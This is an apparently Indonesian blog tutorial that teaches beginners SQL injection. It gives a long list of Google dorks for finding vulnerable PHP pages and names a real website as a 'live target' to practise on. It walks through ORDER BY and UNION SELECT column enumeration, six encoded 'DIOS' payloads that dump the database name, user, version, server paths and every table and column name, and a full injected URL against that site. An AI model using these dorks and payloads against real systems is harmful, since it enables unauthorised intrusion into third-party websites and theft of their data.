TUTORIAL CARA SQL INJECTION BAGI PEMULA
SQL INJECTION Bagi Pemula
Assalamualaikum
Whatsap bro balik lagi ya sama gua MrJack kali ini gua bakal kasih materi sql injection bagi pemula:v
Ok tanpa berlama"langsung aja ya cuk:V
Bahan² Nya
- Dork
- Dios
- Niat
- Crome+Kuota+Hp
Dork ny
Dork : SQL INJECTION
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:lay_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:ageid=
inurl:games.php?id=
inurl:age.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:rtray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurlinions.php?id=
inurl:spr.php?id=
inurl:ages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:articipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:rod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:erson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:rofile_view.php?id=
inurl:category.php?id=
inurl:ublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:rod_info.php?id=
inurl:shop.php?do=part&id=
inurl:roductinfo.php?id=
inurl:collectionitem.php?id=
Nah itu dork nya kembangin pake otak lu yang pinter udah gede kan masa gak bisa.. gak bisa dorking gak usah ngehek awoakowkw:V
Lanjut Nih gw ada live target Buat Kalian coba
Kansascitynova.org/news.php?id=42
Pertama Cara mengetahui Web itu rentan Terhadap SQL INJECTION,Gampang kalian Kasih Tanda String ' Di samping Parah
Contohnya seperti ini
Kansascitynova.org/news.php?id=42'
Nah Kalau Tampilan Web berubah seperti Itu , seperti Gambar Di atas itu Tandanya Web ny rentan terhadap Sql Injection
Lanjut
Kalian order+by+1--+-
Nah di angka satu belum eror terus Naikin Sampe angka eorr
order+by+1--+- No eror
order+by+5--+- no eror
order+by+8--+- Eror
Nah eror di 8 Terus Kalian union+select Sampe angka 7 Kenapa di tujuh ???Karena Eror Nya Di 8
Kansascitynova.org/news.php?id=42'union+select+1,2,3,4,5,6,7--+- ke gitu Ya..
Muncul togel Nya Angka 2 ,Terus Kalian kasih Dios di angka togel nya 2
Nih Dios
Dios pertama
concat_ws(%27%3Cbr%3E%27,%27, Inject By MrJack%27,database(),version(),user(),@@hostname,(select(group_concat(%27%3Cbr%3E%27,table_name,%27:%27,column_name))from(information_schema.columns)where(table_Schema=database())))
Dios ke 2
concat(%27INJECT%20BY%20MrJack%27,%27%3Cbr3E%27,%27%3Cimg%20src=%22https://j.top4top.io/p_1827l8bwe0.jpg%22%20width=%22200px%22%20style=%22border:2px%20solid%20blue;%20border-radius:50%;%20box-shadow:2px%202px%2015px%20black;%22%3E%27,%27%3Cbr%3E%27,%27Database%20::%20%27,database(),%27%3Cbr%3E%27,%27Version%20::%20%27,version(),%27%3Cbr%3E%27,%27Hostname%20::%20%27,@@hostname,%27%3Cbr%3E%27,%27Tmp%20dir%20::%20%27,@@tmpdir,%27%3Cbr%3E%27,%27Data%20dir%20::%20%27,@@datadir,%27%3Cbr%3E%27,%27Base%20dir%20::%20%27,@@basedir,%27%3Cbr%3E%27,%27Log%20error%20::%20%27,@@log_error,%27%3Cbr%3E%27,%27Socket%20::%20%27,@@socket,%27%3Cbr%3E%27,%27Pid%20file%20::%20%27,@@pid_file,%27%3Cbr%3E%27,%27Operating%20system%20::%20%27,@@version_compile_os,%27%3Cbr%3E%27,%27Operating%20machine%20::%20%27,@@version_compile_machine,%27%3Cbr%3E%27,%27Symlink%20::%20%27,@@global.have_symlink,%27%3Cbr%3E%27,%27SSL%20::%20%27,@@global.have_ssl,%27%3Cbr%3E%27,%27Port%20::%20%27,@@port,%27%3Cbr%3E%27,%27%3Cbr%3E%27,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,%27%3Cbr%3E%27,table_name,%27%20::%20%27,column_name))))x))
Dios ke 3
concat(0x2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d,0x3c62723e,0x3c62723e, 0x4449204241434f4b204f4c4548204645524459,0x3c62723e,0x3c62723e, 0x2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d2d,0x3c62723e,0x3c62723e, 0x4461746162617365203a3a20,database(), 0x3c62723e,0x55736572203a3a20,user(),0x3c62723e,0x56657273696f6e203a3a20,version(),0x3c62723e, 0x486f73746e616d65203a3a20,@@hostname, 0x3c62723e,0x4461746120646972203a3a20,@@datadir,0x3c62723e,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@))
Dios ke 4
CONCAT(0x496e6a656374206279204645524459,0x3c62723e,0x3c62723e,0x56657273696f6e203a3a20,version(),0x3c62723e,0x4461746162617365203a3a20,database(),0x3c62723e,0x4469726563746f7279203a3a20,@@datadir,0x3c62723e,0x486f73746e616d65203a3a20,@@hostname,0x3c62723e,0x55736572203a3a20,user(),(select(@a)+from+(select(@a:=0x00),(@tbl:=0x00),(select+(@a)+from+(information_schema.columns)+where+(table_schema!=0x696e666f726d6174696f6e5f736368656d61)+and(0x00)in+(@a:=concat(@a,0x3c62723e,if(+(@tbl!=table_name),Concat(0x3c62723e,0x5461626c65203a3a20,@tbl:=table_name,0x3c62723e7e20,column_name),concat(0x7e20,(column_name)))))))a))
Dios ke 5
/*!00000concat*/(0x3C63656E7465723E3C696D67207372633D2268747470733A2F2F612E746F7034746F702E696F2F705F313839363966387434312E706E67226865696768743D2233303070782277696474683D223330307078223C62723E3C62723E3C62723E3C68313E696E6A6563746564206279202E2F46696E64696E4E65743C2F68313E3C2F63656E7465723E0D0A,sysdate(),0x3c62723e,version/**_**/(),0x3c62723e44622055736572203a20,user/**/(),0x3c62723e3c62723e3c2f666f6e743e3c7461626c6520626f726465723d2231223e3c74686561643e3c74723e3c74683e44617461626173653c2f74683e3c74683e5461626c653c2f74683e3c74683e436f6c756d6e3c2f74683e3c2f74686561643e3c2f74723e3c74626f64793e,(select%20(@x)%20/*!00000from*/%20(select%20(@x:=0x00),(select%20(0)%20/*!00000from*/%20(information_schema/**/.columns)%20where%20(table_schema!=0x696e666f726d6174696f6e5f736368656d61)%20and%20(0x00)%20in%20(@x:=/*!00000concat*/(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75652073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c2f74723e))))x))
Dios ke 6
concat(%27%3Ccenter%3E%27,%27%3Cimg%20src=%22https://i.top4top.io/p_1840w7x6p4.jpg%22%20height=%22451px%22%20width=%22459px%22%27,%27%3C/center%3E%27,%27%3C/br%3E%27,%27%3Cfont%20color=%22red%22%20size=%225%22%3EInject%20By%20.MrJack%3C/font%3E%27,%27%3C/br%3E%27,%27%3Cfont%20color=%22red%22%3EUser::%20%20%20%20%20%20%27,user/**_**/(),%27%3C/br%3E%27,%27%3Cfont%20color=%22blue%22%3EVersi::%20%20%20%20%27,%27%3C/font%3E%27,version/**_**/(),%27%3Cbr%3E%27,%27%3Cfont%20color=%22green%22%3EDatabase::%20%20%20%27,%27%3C/font%3E%27,database/**_**/(),%27%3C/br%3E%27,%27%3Cfont%20color=%22blue%22%3EHost::%20%20%20%27,@@HOSTNAME,%27%3C/font%3E%27,%27%3C/br%3E%27,%27%3Cfont%20color=%22green%22%3EDirectory::%20%20%20%20%20%20%27,@@BASEDIR,%27%3C/font%3E%27,%27%3C/br%3E%27,%27%3Cfont%20color=%22blue%22%3ESymlink::%20%20%20%20%27,@@HAVE_SYMLINK,%27%3C/font%3E%27,%27%3C/br%3E%27,%27%3Cfont%25color=%22green%22%3ESSL::%20%20%20%27,@@HAVE_OPENSSL,%27%3C/font%3E%27,%27%3C/br%3E%27,%27%3C/br%3E%27,(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/%20(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x))
Nah terINJECT kan
Contoh nya gini
http://kansascitynova.org/news.php?id=42%27union+select+1,concat(%27%3Ccenter%3E%27,%27%3Cimg%20src=%22https://i.top4top.io/p_1840w7x6p4.jpg%22%20height=%22451px%22%20width=%22459px%22%27,%27%3C/center%3E%27,%27%3C/br%3E%27,%27%3Cfont%20color=%22red%22%20size=%225%22%3EInject%20By%20.MrJack%3C/font%3E%27,%27%3C/br%3E%27,%27%3Cfont%20color=%22red%22%3EUser::%20%20%20%20%20%20%27,user/**_**/(),%27%3C/br%3E%27,%27%3Cfont%20color=%22blue%22%3EVersi::%20%20%20%20%27,%27%3C/font%3E%27,version/**_**/(),%27%3Cbr%3E%27,%27%3Cfont%20color=%22green%22%3EDatabase::%20%20%20%27,%27%3C/font%3E%27,database/**_**/(),%27%3C/br%3E%27,%27%3Cfont%20color=%22blue%22%3EHost::%20%20%20%27,@@HOSTNAME,%27%3C/font%3E%27,%27%3C/br%3E%27,%27%3Cfont%20color=%22green%22%3EDirectory::%20%20%20%20%20%20%27,@@BASEDIR,%27%3C/font%3E%27,%27%3C/br%3E%27,%27%3Cfont%20color=%22blue%22%3ESymlink::%20%20%20%20%27,@@HAVE_SYMLINK,%27%3C/font%3E%27,%27%3C/br%3E%27,%27%3Cfont%25color=%22green%22%3ESSL::%20%20%20%27,@@HAVE_OPENSSL,%27%3C/font%3E%27,%27%3C/br%3E%27,%27%3C/br%3E%27,(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/%20(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)),3,4,5,6,7--+-
Ok sekian materi tentang SQL INJECTION PEMULA,KALO ADA SALAH DAL ARTIKEL DI ATAS GUA MOHON MAAF WAJARIN PEMULA
Belum ada Komentar untuk "TUTORIAL CARA SQL INJECTION BAGI PEMULA"
Posting Komentar